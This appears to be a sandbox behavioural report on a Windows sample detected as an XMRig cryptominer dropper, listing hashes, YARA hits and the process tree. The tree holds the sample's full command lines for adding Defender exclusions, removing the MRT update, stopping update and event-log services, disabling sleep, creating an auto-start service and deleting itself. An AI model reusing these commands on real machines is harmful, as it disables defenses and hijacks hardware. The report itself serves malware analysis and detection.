Analysis
-
max time kernel
90s -
max time network
108s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 15:18
Static task
static1
Behavioral task
behavioral1
Sample
9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe
Resource
win7-20240903-en
General
-
Target
9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe
-
Size
5.6MB
-
MD5
2e48738515a90e8ed1ea8852d708bb90
-
SHA1
c9e3913850cf8567b64865e398c7cc1181c0b05c
-
SHA256
9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874
-
SHA512
10aac80eb630a86c2a97bec58d20de360e19b68e1b49672d58345942fc9ebe3641680c90f7065b727aa60abc810c0f43b25f2c02b851432ad8a079aff5e3f5e5
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2416-31-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2416-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2500 powershell.exe 1988 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 852 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 476 Process not Found 2744 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
pid Process 476 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2876 powercfg.exe 2864 powercfg.exe 2764 powercfg.exe 2620 powercfg.exe 2884 powercfg.exe 2636 powercfg.exe 3032 powercfg.exe 2700 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2744 set thread context of 2748 2744 fqwofdtexigy.exe 85 PID 2744 set thread context of 2416 2744 fqwofdtexigy.exe 89 -
resource yara_rule behavioral1/memory/2416-24-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-25-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2416-39-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2808 sc.exe 2828 sc.exe 2900 sc.exe 1664 sc.exe 2640 sc.exe 1600 sc.exe 2384 sc.exe 1692 sc.exe 1284 sc.exe 3056 sc.exe 2992 sc.exe 764 sc.exe 2704 sc.exe 1384 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7047c2d98454db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 2500 powershell.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 1708 9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe 2744 fqwofdtexigy.exe 1988 powershell.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2744 fqwofdtexigy.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe 2416 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2500 powershell.exe Token: SeShutdownPrivilege 3032 powercfg.exe Token: SeShutdownPrivilege 2700 powercfg.exe Token: SeShutdownPrivilege 2884 powercfg.exe Token: SeShutdownPrivilege 2636 powercfg.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeShutdownPrivilege 2876 powercfg.exe Token: SeShutdownPrivilege 2864 powercfg.exe Token: SeShutdownPrivilege 2620 powercfg.exe Token: SeShutdownPrivilege 2764 powercfg.exe Token: SeLockMemoryPrivilege 2416 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2624 wrote to memory of 2792 2624 cmd.exe 39 PID 2624 wrote to memory of 2792 2624 cmd.exe 39 PID 2624 wrote to memory of 2792 2624 cmd.exe 39 PID 852 wrote to memory of 1660 852 cmd.exe 64 PID 852 wrote to memory of 1660 852 cmd.exe 64 PID 852 wrote to memory of 1660 852 cmd.exe 64 PID 2088 wrote to memory of 1928 2088 cmd.exe 72 PID 2088 wrote to memory of 1928 2088 cmd.exe 72 PID 2088 wrote to memory of 1928 2088 cmd.exe 72 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2748 2744 fqwofdtexigy.exe 85 PID 2744 wrote to memory of 2416 2744 fqwofdtexigy.exe 89 PID 2744 wrote to memory of 2416 2744 fqwofdtexigy.exe 89 PID 2744 wrote to memory of 2416 2744 fqwofdtexigy.exe 89 PID 2744 wrote to memory of 2416 2744 fqwofdtexigy.exe 89 PID 2744 wrote to memory of 2416 2744 fqwofdtexigy.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe"C:\Users\Admin\AppData\Local\Temp\9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1708 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2792
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2808
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2704
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\9977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874N.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1660
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1928
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1384
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2748
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD52e48738515a90e8ed1ea8852d708bb90
SHA1c9e3913850cf8567b64865e398c7cc1181c0b05c
SHA2569977094f6d16ca8e1ff3706917645e957144204523ed15344ccbbccf7a451874
SHA51210aac80eb630a86c2a97bec58d20de360e19b68e1b49672d58345942fc9ebe3641680c90f7065b727aa60abc810c0f43b25f2c02b851432ad8a079aff5e3f5e5